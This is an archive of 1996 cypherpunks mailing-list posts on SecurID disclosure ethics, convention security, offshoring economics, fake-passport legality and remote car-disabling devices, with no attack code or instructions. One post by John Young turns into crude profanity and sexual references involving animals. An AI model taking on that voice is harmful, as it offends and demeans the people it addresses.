Date: Sun, 11 Aug 1996 20:31:06 +0800
To: Vin McLellan <vin@shore.net>
Subject: Re: F2 hash?
In-Reply-To: <v02130503ae313d72ccb8@[206.243.160.206]>
Message-ID: <Pine.BSD/.3.91.960811054832.7724C-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain





On Fri, 9 Aug 1996, Vin McLellan wrote:

>        As Cerridwyn Llewyellyn <ceridwyn@wolfenet.com> reported, Mudge --
> posed and celebrated on page 40-something of last month's WiRed -- told the
> DefCon audience that SDTI's lawyers were after him, threatening something
> dire, so he was not going to release his "white paper" on weaknesses in the
> ACE/SecurID system for several months.  Instead, he delivered a talk on
> s/key vulnerabilities.
> 
>         This was weird, because I *knew* Security Dynamics had neither
> consulted nor asked their lawyers to do anything about Mudge's speech on
> SecurID vulnerabilities.  It would have been a fool's ploy: silly and
> counterproductive.
> 
>         John and I took Mudge out for dinner right after that speech. He
> told us then that he had inadvertently misspoken when he blamed his
> temporary silence on SDTI's lawyers. The real problem, he said, was with
> bullying lawyers from two corporate clients he is now under contract to in
> his day job.
> 
>         (He didn't explain this further, but I understood that Mudge is
> working for two firms which have access to SDTI plans and trade secrets
> under non-disclosure agreements.  The firms were apparently worried about
> their liability -- given their promises to SDTI and Mudge's work in their
> employ.  Mudge may want to elaborate on this.  Or not.)
> 

Hrmmm. Let me set the record straight here. Lest people think I would 
violate nda agreements upon end of contracts. sigh.

First, I am not under any NDA agreement with STDTI. All of my research 
and work on the SecurID token cards was done independently from any of 
the companies I am currently contracting for (I noticed that there were 
several problems with the system and that's enough to set me off on 
something).

Second, while I did refrain from going into specifics on SecurID 
vulnerabilities at the talk - I did give one on some of the problems with 
OTP's in general. S/Key happened to be a good example to use in 
illustration as a large portion of the audience there was familiar with 
it. Many of the vulnerabilities mentioned there hold true to SecurID.

Third, and most important, the reason I refrained from giving the SecurID 
talk was that the two companies I am doing some security related contract 
work for both employ this technology in varying degrees. I have explained 
the problems that I have found to these companies and they are quite 
concerned. I believe it would be un-ethical to give out instructions on 
how to break through SecurID, thus leaving networks vulnerable that I am 
being paid to help secure before the problem has been addressed locally 
(I like being able to put food on the table). The information will be made 
public in the near future. SDTI has been made aware of these problems 
(some of which were presented to them almost a year ago).

I don't dislike SecurID. I am quite happy to have made Vin and John's 
acquaintance as they are both wonderfull people. I do feel that there are 
problems with SecurID that exist largely due to the card being sold into 
an environment that it was not designed for (a little thing called the 
internet).

I just wanted to set the record straight as I realised that the inital 
statements that Vin made could be mis-interpreted and potentially impact my 
image to future employers (though I know that this was not his intention).

cheers,

.mudge

PS I do not currently read / keep up with the cypherpunks list. So I 
probably will only see the bits of this thread that are forwarded to me.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sun, 11 Aug 1996 08:06:58 +0800
To: cypherpunks@toad.com
Subject: GOP Security (fwd)
Message-ID: <199608102127.HAA15949@suburbia.net>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
>From notes@igc.org  Sun Aug 11 07:25:25 1996
Date: Sat, 10 Aug 1996 12:46:19 -0700 (PDT)
Reply-To: Moderator of conference "justice.polabuse" <bwitanek@igc.apc.org>
From: Bob Witanek <bwitanek@igc.apc.org>
Subject: GOP Security
To: Recipients of pol-abuse <pol-abuse@igc.apc.org>
Message-ID: <APC&1'0'a9f98b16'b93@igc.apc.org>
X-Gateway: conf2mail@igc.apc.org
Errors-To: owner-pol-abuse@igc.apc.org
Precedence: bulk
Lines: 201

Posted:  Michael Novick <mnovickttt@igc.apc.org>

Philadelphia Inquirer: Page One
Sunday, August 4, 1996
Next security test: GOP's convention

Even before the Atlanta bombing, San Diego had battened down for
the Republican s' meeting.
By Carol Morello
INQUIRER STAFF WRITER
 SAN DIEGO  -- For all the festive bunting and wacky elephants
springing up around town, the Republican National Convention will
open here in a grim atmosphere of no-nonsense security.

 With a week left to go, Harbor Street, six lanes sweeping past the
convention center, already has been closed to traffic. Owners of
boats docked in the marina adjoining the center have been notified
that their vessels will be swept and boarded for ``consensual
searches.''

 Tall chain-link fences ring the convention center itself. But
metal detectors like the ones the delegates will pass through were
deemed too unwieldy for the parking lot across the street, where
65 protest groups have been assigned carefully choreographed time
slots. Instead, a sign at the entrance will advise that satchels
and backpacks may be searched, and police have leased 200 pieces
of high-tech equipment to detect firearms and explosives.

 Police also have gathered floor plans and photographs of every
hotel and party site where delegates will be lodged and feted, all
considered potential targets. They have even pressed the Retired
Senior Citizens Patrol into service, and encouraged abortion
doctors to ``take a vacation.''

 Authorities in Chicago, where the Democrats will meet the last
week of August, are taking similar precautions. Metal detectors,
bomb-sniffing dogs and surveillance cameras will be in force, along
with thousands of police. Coast Guard cutters will patrol Lake
Michigan. Chicago police are sealing an eight-block area around the
United Center sports arena, the main convention site, to all
unauthorized cars, trucks and pedestrians.  As the 20th century
nears an end, wary, pervasive security is as much a part of the
convention scene as Old Glory and silly hats. San Diego has been
preparing convention security for more than a year. Then a bomber
on the other side of the country suddenly made everyone wonder if
the next big public event could be free of mayhem and terror.

 In an emergency meeting called the day after a pipe bomb exploded
at the Olympics in Atlanta, convention security planners assured
Mayor Susan Golding that plans already in place were adequate. They
said they neither made, nor expect to make, any significant
changes. They have devised more than 100 scenarios that could
threaten a peaceful convention, from an earthquake to a building
collapse to a bomb like the one that twisted Atlanta's moment of
glory.

 Carl Truscott, head of convention security for the Secret Service,
said he had reached a ``comfort level'' for security within the
center itself. His agents are conducting sweeps of the 800 to 1,000
sites around San Diego County where party potentates will appear.
But he said the sweeps began before Atlanta's bombing.  ``It
certainly raised our awareness level and concern,'' said Capt. Dave
Bejarano, head of the San Diego Police Department's convention
security planning unit, which is coordinating the deployment of law
enforcement from 18 different agencies. ``But we've made no
significant changes. We'll just be more proactive. We're planning
for the worst-case scenario, and hoping for the best.''

 After two failed bids, San Diego fought hard for this moment in
the sun. But even before it's begun the clouds are out.

 Television networks and party poo-bahs have groused about the
convention center's puny dimensions. Protesters went to court to
guarantee a demonstration zone where delegates can hear and see
them after the Republicans tried to shuffle them down the street.

 With equal amounts of anticipation and trepidation, San Diegans
are prepared to host 50,000 visitors who can charitably be
described as intense  -- 8,000 conventioneers, 12,000 media
representatives and tens of thousands of protesters. They know the
GOP gathering will showcase this city of 1.2 million people more
than all previous events held here, from the Super Bowl to the
World Series.

 Twice before, San Diego was an also-ran in the convention
sweepstakes. In 1972, the convention that nominated Richard Nixon
to a second term was moved to Miami when a leaked memo by ITT
lobbyist Dita Beard disclosed that the Justice Department dropped
an antitrust lawsuit against the corporation after it donated
$400,00 to the San Diego convention campaign. And in 1992,
Republicans encouraged the city to make a costly bid, only to pick
Houston in George Bush's home state.

 With the conventions-that-almost-were behind them, the city that
alternately describes itself as ``America's Finest City'' and the
``City of the 21st Century'' hopes to prove to the country  -- and
itself  -- that it has more going for it than the weather.

 ``We believe in a lot of outside feedback,'' said Francine
Phillips, author of America's Finest City  -- If We Say It Enough
We'll Believe It. ``We've long felt that if we do it here, it's not
really good enough.

 ``For years and years, we were second to Los Angeles in size and
second to San Francisco in sophistication. Now San Diego is coming
into its own. It's an opportunity, and a risk. We're going to get
exposure, and we feel vulnerable.''

 Jack Ford, son of former President Gerald Ford, is responsible for
setting the stage in the compact bayside convention center, built
in 1989. It was designed to hold 13,000, but it's been reconfigured
to hold 19,600. That still falls well short of 50,000 in Houston's
Astrodome and 40,000 in New Orleans' Superdome, site of the 1988
convention.

 Seating is so tight that it has helped the price for nondelegate
tickets soar through the convention center's tentlike roof. In
Houston, anyone who donated $1,000 to the party got two floor
passes. In San Diego, donors have to pony up $100,000 to qualify
for the same two tickets.

 The host committee's head of protocol, Bill Black, couldn't even
secure enough seats for the 92 foreign ambassadors and their
spouses he's entrusted with shepherding around the convention and
to social events. Since most are smokers, however, he figures he
can rotate them in and out of seats when they sneak to the terrace
for a smoke.  It will look more cramped than recent conventions.
A CBS executive complained the convention will come across on TV
screens like ``a postage stamp with a bunch of ants crawling around
on it.''  Ford, executive director of the host committee, put the
best face on the situation as he walked around the convention floor
recently.

 ``It's the Camden Yards of conventions centers,'' he said, as
stagehands hammered away on temporary skyboxes. ``It will be more
intimate, not big and sterile like Veterans Stadium.''

 As for all the carping about not having a dramatic balloon drop
from the 27-foot ceiling, Ford said jovially: ``There are lots of
other possibilities, not the least of which is having a balloon
rise.''

 An array of protesters has lined up to get a rise out of
delegates. To control them, police drew up 55-minute slots spread
over five days, with 15-minute breaks to rotate protest groups.

 Groups stood in line for up to 72 hours to have first crack at the
65 spots. Thirteen protest groups identify themselves as Democrats.
At least eight spots were reserved by gay and lesbian groups. 
``This is going to be the largest mobilization of lesbians and gays
ever in this country,'' said Brenda Schumacher, a spokesman for a
group called Lesbian, Gay, Bisexual and Transgender Voices '96.
``We've faced an extremely hostile political environment ever since
'92. We want to expose the lies and show an accurate picture of who
we are.''  The Republican National Committee tried to confine all
the protesters to a sit e three blocks from the convention center.
It said the parking lot across the street should be reserved for
handicapped parking.

 But the ACLU sued, and a federal judge agreed the Republican
proposal would violate the protesters' right to be seen and heard
by delegates. Police, who estimate 10,000 protesters at a time can
wedge onto the two-acre parking lot, had drawn up the time slots
for protest groups wherever they wound up.

 Parking will be at a premium. The Secret Service has banned
underground parking at the convention center. And the Republican
National Committee has reserved every spare parking space in town
for its people.

 The host committee raised about $12 million to put on this party,
more than double what any other city contributed before. In return,
it's counting on $160 million to be spread around town during
convention week and good publicity to pull in even more economic
benefits.

 Knowing the Republican reputation for big spending, every business
in the vicinity, from Hooters restaurant to the Goodwill Industries
store, is decking itself out with GOP paraphernalia.

 The Cuban Cigar Factory laid on extra tobacco rollers in early
January. Limousine companies lined up cars from Arizona and Nevada.
One bar opened its doors just two months ago, unabashedly calling
itself the Grand Old Party, complete with a pink neon elephant in
the window. Even Carol the Painting Elephant at the San Diego Zoo
is getting into the act, readying an exhibit of the brush strokes
created by her swinging trunk.

 Still, a few San Diegans profess to be unfazed about all the
hoopla.

 ``This is not the biggest convention we've ever had,'' said
Stephen Cushman, a Mazda and Jaguar auto dealer who is deputy
chairman of the host committee. ``Alcoholics Anonymous and the
Baptist ministers both held bigger conventions here. We handled
those just fine.''

Posted in pol-abuse@igc.apc.org
To subscribe, send this message: subscribe pol-abuse
To this address: majordomo@igc.apc.org


-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Sun, 11 Aug 1996 22:21:23 +0800
To: cypherpunks@toad.com
Subject: INFO: Gather and talk to Republican luminaries live online from the convention!
Message-ID: <199608111220.IAA22009@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


----------------------------------------------------------------------------
	     REPUBLICAN CONVENTION!  LIVE!  CHECK IT OUT ONLINE!
		(DO NOT DISTRIBUTE AFTER AUGUST 20, 1996)

WHAT:   Live feed from the Republican Convention in San Diego over the net
	Eat, drink, shmooze with Republican luminaries through the Net.
WHERE:  @Cafe, #12 St. Mark's Place (212-979-5439)
WHEN:   8:30pm, Tuesday August 13, 1996

At 8:30pm EST on Tuesday, August 13, 1996, the Republican National Convention
will be broadcast live over the Internet!  The Several members of Congress
will be present and, technology and Murphy's Law permitting, they'll be
able to talk to you online through CUSeeMe.

Many of New York's Republicans will be gathering at the @Cafe (address
below), one of New York's many fine cybercafes, to eat, drink, shmooze,
and queue up for a chance to talk to notable Republican legislators
live from the Republican convention.

Montana Senator Conrad Burns, who has been a driving force within the
bi-partisan push to deregulate encryption, will be cyber-present, as will
Montana Governor Marc Racicot, widely regarded as a visionary.

The event is being coordinated in San Diego by Mike Rawson of Senator
Conrad Burns office.  Rawson, who has been instrumental in putting the
Senate hearings live online along with Jonah Seiger of the Center for
Democracy and Technology, will be bringing Senators, and other luminaries
to the event.

The Republican National Convention's live broadcast page is at:
http://www.convention96.rnc.org/live.htm
Simply point your Web browser there on Tuesday night to see the live
goings-on.

The @Cafe is where most people will probably gather, but there are many
fine Internet cafes in New York.  To find the one nearest you, go to
Clay Irving's NYC Guide at: http://www.panix.com/~clay/nyc/cybercafes.shtml

@cafe
        12 St. Marks Place.
        It's an Internet provider! No, it's a restaraunt! Whatever it is,
	it seems like a cool place! 

alt.coffee
        139 Avenue A - Tel: 212.529.CAFE
        coffee. computers. comfy chairs. 

Cyber Cafe
        273A Lafayette Street, New York, New York 10012 Tel: (212) 334-5140
        Fax: (212) 334-6436
        In the heart of SOHO New York, Cyber Cafe is a stylish interface
	between the latest internet technology and the best
        in fresh, organic food. 

Internet Cafe
       3rd Street (between 1st and 2nd) 

Kokobar
        espresso bar-cafi-bookstore features workstations for all-out Internet
        access. Located in Fort Greene. 

The VOID
       16 Mercer Street (at Howard, one block north of Canal) 


For more information on the live hookups from the Republican convention,
contact Mike Rawson at Senator Conrad Burns' office at 202-224-8250.
For more information on the gathering at the @Cafe in New York City, contact
Shabbir J. Safdar at 917-978-8430.

				###




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 12 Aug 1996 00:30:41 +0800
To: cypherpunks@toad.com
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <2.2.32.19960811123331.011a8e08@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:15 AM 8/10/96 -0400, Scottauge@aol.com wrote:
>I was watched CBS reports a couple nights ago about how all these blue collar
>and now white collar jobs are going across seas.
>
>So a possible way to protect jobs is to protect the knowledge on how to do
>them.  
>In essence, knowledge is money, cuz that is what we usually want for it
>now-a-days.  "Oh you want me to do that for you, hmmmm, lets see...."

The first axiom of economics is "Wants are unlimited."  I'm glad that
they're "shipping all those jobs overseas."  The more people we have working
the more goodies are produced.  If the labor of US workers is freed up, then
they can go about producing something else valuable that they didn't have
time to produce before because those "third worlders" weren't doing their
fair share back when they were trapped in feudalism or fabian socialism.
You can't get more stuff (wealth) unless everyone is out there working to
capacity (consistent with their desired work/leisure tradeoff).

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 11 Aug 1996 23:54:19 +0800
To: Vincent Cate <cypherpunks@toad.com
Subject: Re: Anguilla / taxbomber  - legality
Message-ID: <2.2.32.19960811134146.00a288a8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:56 AM 8/11/96 -0400, Vincent Cate wrote:
>But fraud is illegal in Anguilla, and fake passports are concidered
>fraud.
>

I should have thought that fraud required use rather than manufacture.  It
is hard to defraud someone just by making something.  You have to
communicate with them in some way.  

The US has very broad fraud statutes and yet these passports are sold in the
US.  I've never heard of any action against them.  There is also a First
Amendment issue with the World Federalists and their "Citizen of the World"
passport.  

In any case, and ISP is not a publisher or vendor.

Sometimes people pay more attention to lawyers than they should.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Sun, 11 Aug 1996 15:22:49 +0800
To: cypherpunks@toad.com
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <1.5.4.32.19960811041731.00305a5c@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 02:05 10/08/96 -0700, Timothy C. May wrote:
>At 12:15 PM 8/10/96, Scottauge@aol.com wrote:
>>I was watched CBS reports a couple nights ago about how all these blue collar
>>and now white collar jobs are going across seas.
>
>Where do I begin? First, what does "taking jobs away from us" mean? That we
>own these jobs? And who is "us"?

Well said. While I didn't see the CBS program , I bet the
scaremongerers did not point out that programmers don't just
produce software, they are major consumers as well. The growth of
the software industry in other countries therefore means business
for US industry, which produces most of the compilers and other
utilities that programmers everywhere use. This clearly helps
programmers in the US. 

>>So a possible way to protect jobs is to protect the knowledge on how to do
>>them.

To some extent this happens automatically -- for instance, if you
live in the Silicon valley, your knowledge levels are higher on
account of higher frequency of user meets, conferences, etc. But,
to the extent you use the Internet as an information source, it
is available internationally. So you cannot have it both ways:
use an open forum like the Internet, and hope to keep knowledge bottled in.

In earlier generations of computing, monopolistic organizations
such as IBM and DEC charged huge sums for information. One of the
reasons that IBM was thrown out of India in the mid seventies was
their practice of shipping only outdated computers from the US to
India. Indian programmers were at a disadvantage, and clearly
could not charge as much as American ones. But the openness of
MS-DOS and UNIX changed all that, a trend that has only been
strengthened by the Internet. 

While jobs could easily move overseas, the developing world may
not be able to absorb them. To start with, such migration assumes
the availability of excellent telecom facilities. These are
severely lacking in most developing countries, which have about
75% of the world's population and 16% of its product, but only
12% of the total number of telephone main lines. These too are
mostly in cities. While the World Bank's 1988 figures indicate
that in industrialized countries, major cities have a 20-30%
higher telephone density than do other areas, in a country like
Ethiopia, cities have a density of about 14 times the national
average. In other words, most people in developing countries have
practically no access to telecom facilities. In addition, the
quality of the facilities, typically provided by state-owned
monopolies, is often abysmal. While low-earth orbit satellite
projects such as Iridium, Odyssey, Teledisc and Globalstar
threaten to change all this, little impact will be felt until the
end of the decade. In any case, telecom facilities in the
industrialized countries will most likely continue to be
considerably superior, providing workers there with an ongoing
competitive advantage.

Further, as economists such as Paul Krugman point out, developing
countries lack the means for sustained growth ("Which Asian
Model?", Newsweek, November 20, 1995). Those economies that have
shown dramatic growth, such as the East Asian, have relied
essentially on low-cost inputs, rather than on their efficient
utilization. Professor Alwyn Young of Boston has in fact come to
the surprising conclusion that Singapore's total factor
productivity (which measures such efficiency) is so poor as to be
comparable to that of the Soviet Union. He points out that "at
just the time that everybody was ranting about how magnificent
Japan was, it ceased to catch up."

Cheap inputs is not a long-term phenomenon, as companies looking
for good programmers in India are increasingly discovering.
Programmer salaries in India are rapidly rising. While many
youngsters are keen to become programmers, India lacks adequate
training facilities. Today, teachers receive poor pay, even by
Indian standards. Educational institutions are hardly going to be
able to raise salaries of software teachers alone, while raising
them for everybody will be impossible. Consequently, there is
going to be little  incentive for good programmers to become
teachers, and the educational institutions will continue to churn
out large numbers of poorly trained students. It is suggested
that universities in industrialized countries could use the
Internet to teach students in developing countries, but the
efficacy of this model has yet to be proven.

Also, a very small percentage of Indians are fluent in English,
and from it come the senior bureaucrats, managers for the private
sector, the military, newspapers, educational institutions -- in
short, all the important posts of the country. Unless there is to
be a severe disruption of the nation's activities, not too many
can be diverted to cater to export.

>>Perhaps there is a larger picture in the world that the cyperpunks mailing
>>list is missing.  That cryptography is not just for personal privacy, but
>>could involve job security also - as a matter of fact, the income base for
>>this whole country.

I'd argue the opposite: I see no reason why companies such as
Netscape have to put up with such draconian US laws as ITAR: why
don't they simply develop their software overseas? If they made a
highly publicised move, that might do wonders to change the
opinions of US Congresspersons voting on ITAR-related legislation.

My prediction is that with the blessings of the Internet, the
next generation of multiracial programmers, even those that were
born in the USA, will be more likely to be found on the beaches
of tropical islands than in the fog of San Francisco. When you
can work in the shade of a palm tree, even if you should earn
less, it's worth it :-)

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 12 Aug 1996 01:37:40 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Rumors of death of Anguilla Data are greatly exagerated.
In-Reply-To: <ae32ba0103021004a3cd@[205.199.118.202]>
Message-ID: <199608111520.LAA12619@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> Selling fake passports seems not to be something Vince ought to even be
> paying attention to. Granted, pressure from outside states may put pressure
> on Vince, but this actually confirms my worst (OK, _nearly_ my worst)
> suspicions about the viability of such data havens.

Vince has the right to run his business any way he likes.

In some jurisdictions, "Fake" passports are legal. In some, they are
illegal. Vince feels that in his jurisdiction they are illegal. He has
every right to decide who to allow to run off of his web servers --
even to be arbitrary about it.

Vince has made it very clear that he is NOT a data haven. Anguilla is
a TAX HAVEN. That is, if you are selling copies of some software over
the net or what have you, and you run the business out of Anguilla,
you are not liable for any Anguillian taxes because there are none.

Anguilla is *not* a data haven, drug haven, or any other sort of
haven. I would have thought that Vince made this clear.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kickboxer <charlee@netnet.net>
Date: Mon, 12 Aug 1996 03:03:40 +0800
To: cypherpunks@toad.com
Subject: Re: Email Bombing
Message-ID: <199608111631.LAA13681@netnet1.netnet.net>
MIME-Version: 1.0
Content-Type: text/plain


        Yeah, but if the REAL email bomber were such an accomplished hacker,
he did not alter the scripts well enough to make the SysAdmin overlook them...

-kickboxer
                                                                               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian C. Lane" <blane@aa.net>
Date: Mon, 12 Aug 1996 04:50:18 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Police prepare stunning end for high-speed car chases
In-Reply-To: <2.2.32.19960810235220.00a455fc@panix.com>
Message-ID: <Pine.LNX.3.94.960811114822.19459A-100000@big.aa.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 10 Aug 1996, Duncan Frissell wrote:

> Time to fire up the '57 Chevy.
> 
> >         A high-powered electrical device under development at the
> Pentagon's Army Research

  Actually people have done this before, using amplified radar guns to fry
the electronics in newer cars. That's why I've always favored pre  '70s
vehicles. You can work on em, and they can't be shot from under you with
new hi-tech weapons.

  I wonder what will happen in the insurance industry when cops start
using these devices to stop car thieves. They'll recover the car but it
will require a whole new brain (and who knows what else). I'm suprised
that the Clinton administraion hasn't called for a car-escrow system
whereby duly authorized law enforcement officials (with the permission of
a Judge od course) can send a signal to your car's computer to make it
shut off (or slow down or whatever).

   Brian

------- <blane@aa.net> -------------------- <http://www.aa.net/~blane> -------
  Embedded Systems Programmer, EET Student, Interactive Fiction author (RSN!)
==============  11 99 3D DB 63 4D 0B 22  15 DC 5A 12 71 DE EE 36  ============





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 11 Aug 1996 22:15:26 +0800
To: cypherpunks@toad.com
Subject: Re: Police prepare stunning end for high-speed car chases
Message-ID: <199608111213.MAA26617@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Aug 10, 1996 23:07:44, 'shamrock@netcom.com (Lucky Green)' wrote: 
 
 
>At 23:16 8/10/96, Anonymous wrote: 
>>Why don't they just have government access to car engines?  They could 
>>just require car manufacturers to include remote shutdown devices for 
>>the engines. 
> 
>But they will. Didn't you know that? 
 
 
Why don't we have people's access to government? We could require officials
to include remote shutdown devices when they renege on promises, line their
pockets, start wars to get re-elected, betray public trust by cruel neglect
of their sworn obligations while strutting and bombasting -- damn fools
interrupting my X-rated sleazy cheating schemes to fuck my neighbor's dog,
or ferret, or mudhole; god, I hate my momma's favorite fuck-up, poor little
me, please, world, help me get off Ritalin and wheat germ and my
lead-filled ass. Now, off to Sunday school to pray not to burn in hell. On
second think, fuck it, com 'ere pooch. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 12 Aug 1996 13:24:53 +0800
To: cypherpunks@toad.com
Subject: re: National Socio-Economic Security Need for Encryption  Technology
Message-ID: <ae33e6f0010210042d89@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:31 PM 8/11/96, Bart  Croughs wrote:

>         But there is another axiom of economics which the
>nationalist/socialist can use for his case against the free movement of
>capital. This axiom states that the wages of workers depend on the amount
>of capital invested. The more capital invested, the higher the wages are.
>If American

I agree strongly. In my Econ 101 class, lo those many years ago, I was
constantly reminded to "Remember the Croughs Axiom!"

It is why MacDonald's workers, who work at a company which has invested
truly vast sums of money in the capital of its outlets, pays its workers so
much more than do the legal firms, advertising firms, etc., which have
invested almost nothing in the capital of their facilities.

This is why so many lawyers choose to move into hamburger flipping. In
fact, the lawyer who won the "hot coffee" lawsuit is now a Milkshake
Trainee at the East Outback, Wisconsin MacDonalds.

"Would you like fries with that?"

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "I=(!isnum(self))" <geeman@best.com>
Date: Mon, 12 Aug 1996 05:03:13 +0800
To: cypherpunks@toad.com
Subject: US Power Outages
Message-ID: <320E3840.5C65@best.com>
MIME-Version: 1.0
Content-Type: text/plain


I wonder if someone's probing power-system vulnerabilities and defense 
strategies.

Just coincidental that there's been all this noise about power grid 
vulnerability and two vast regional outages this summer?

We spent an enjoyable evening around the oil lamps ... maybe it's not 
such a bad thing, this vulnerability......

<blink>


   ... POOF!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 12 Aug 1996 14:53:43 +0800
To: cypherpunks@toad.com
Subject: India, Productivity, and Tropical Climes
Message-ID: <ae33ea6002021004fc46@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



It's human nature, and the nature of information theory (at least our
version), to focus on points of disagreement. "I agree" messages are
frowned upon (but so, it seems to me, would "I disgree" messages....but
most who disagree choose to comment on specific points, while most who
agree seem to agree on the overall theme.

In any case, I agree with Arun's points, and I am pleased--in a
transnationalist sense--that an Indian makes these points.


At 4:17 AM 8/11/96, Arun Mehta wrote:
>At 02:05 10/08/96 -0700, Timothy C. May wrote:

>>Where do I begin? First, what does "taking jobs away from us" mean? That we
>>own these jobs? And who is "us"?
>
>Well said. While I didn't see the CBS program , I bet the
>scaremongerers did not point out that programmers don't just
>produce software, they are major consumers as well. The growth of
>the software industry in other countries therefore means business
>for US industry, which produces most of the compilers and other
>utilities that programmers everywhere use. This clearly helps
>programmers in the US.

As others have noted, _all_ productive output helps _all_. That is,
productivity around the world is a "common good." As Milton Friedman points
out, what should our response be if the Koreans want to sell us
supertankers at $1 each? Buy as many as we can.

(Though this sounds absurd, my old company's ability to crank out
multimillion transistor chips running at 200 MHz must seem similar to many
countries. What should Germany's or India's response to 200 MHz Pentia
selling for $200 be? Buy all they can and integrate them into systems.)

>In earlier generations of computing, monopolistic organizations
>such as IBM and DEC charged huge sums for information. One of the
>reasons that IBM was thrown out of India in the mid seventies was
>their practice of shipping only outdated computers from the US to
>India. Indian programmers were at a disadvantage, and clearly

This I tend to disagree with. I recall that India had some laws in the
1970s which required companies to dislose trade secrets to them. As a
result, IBM chose not to stay in India. I recall that Coca-Cola also
refused to turn over the formula for Coke, but this may've been urban
legend. The IBM case is pretty well-documented. IBM would've sold the
latest and greatest technology to India if: a) it was profitable to them,
b) if India could've paid for a 370/90 or whatever in 1975, c) if COCOM
regulations would have allowed such a sale (doubtful, given the Ghandi
dynasty's cozying up to the Sovs in the 70s.

I don't think shipment of "old technology" to India was at all on IBM's
list of concerns, certainly not back then.


>Further, as economists such as Paul Krugman point out, developing
>countries lack the means for sustained growth ("Which Asian
>Model?", Newsweek, November 20, 1995). Those economies that have
>shown dramatic growth, such as the East Asian, have relied
>essentially on low-cost inputs, rather than on their efficient
>utilization. Professor Alwyn Young of Boston has in fact come to
>the surprising conclusion that Singapore's total factor
>productivity (which measures such efficiency) is so poor as to be
>comparable to that of the Soviet Union. He points out that "at
>just the time that everybody was ranting about how magnificent
>Japan was, it ceased to catch up."

A good friend of mine was stationed in Japan for Intel for 9 years. He
confirms that the Japanese are really struggling. (I have a lot of
independent evidence for this, but will not go into it here.)

The Japanese bought a theory that industrial policy was best-determined by
MITI, their central-planning organization. They gambled on RAMs and on a
vague dream of "Fifth Generation" systems, but they missed workstations,
PCs, and the Web. (And a bunch of other things that American companies have
dominated in.)

(responding to comments from someone else)

>I'd argue the opposite: I see no reason why companies such as
>Netscape have to put up with such draconian US laws as ITAR: why
>don't they simply develop their software overseas? If they made a
>highly publicised move, that might do wonders to change the
>opinions of US Congresspersons voting on ITAR-related legislation.

This is not so much of a mystery. The vagueness of the ITARs and the powers
of the American State are such that Netscape, for example, would probably
be in violation of the ITARs if it subcontracted-out the security features
of Navigator to a non-U.S. company. Think "hooks." Think "exporting
knowledge."

I agree that Netscape would galvanize the debate by announcing, say, that
furhter development of Navigator would take place in Ireland or Slovenia or
India. But I doubt it would accomplish much....the U.S would be on the horn
immediately to their lap dogs in Ireland, Slovenia, and Ireland, warning
them of the consequences, and would likely find multiple ways to pressure
Jim Clarke and Netscape.

(Any of the three Weinstein brothers are welcome to explain why Netscape
would not yield to such pressures. But if any of them comment, ask them why
Netscape has not elected to solve this problem--which according to reports
is costing them sales--by doing precisely this. Are they stupic, or what?)

>My prediction is that with the blessings of the Internet, the
>next generation of multiracial programmers, even those that were
>born in the USA, will be more likely to be found on the beaches
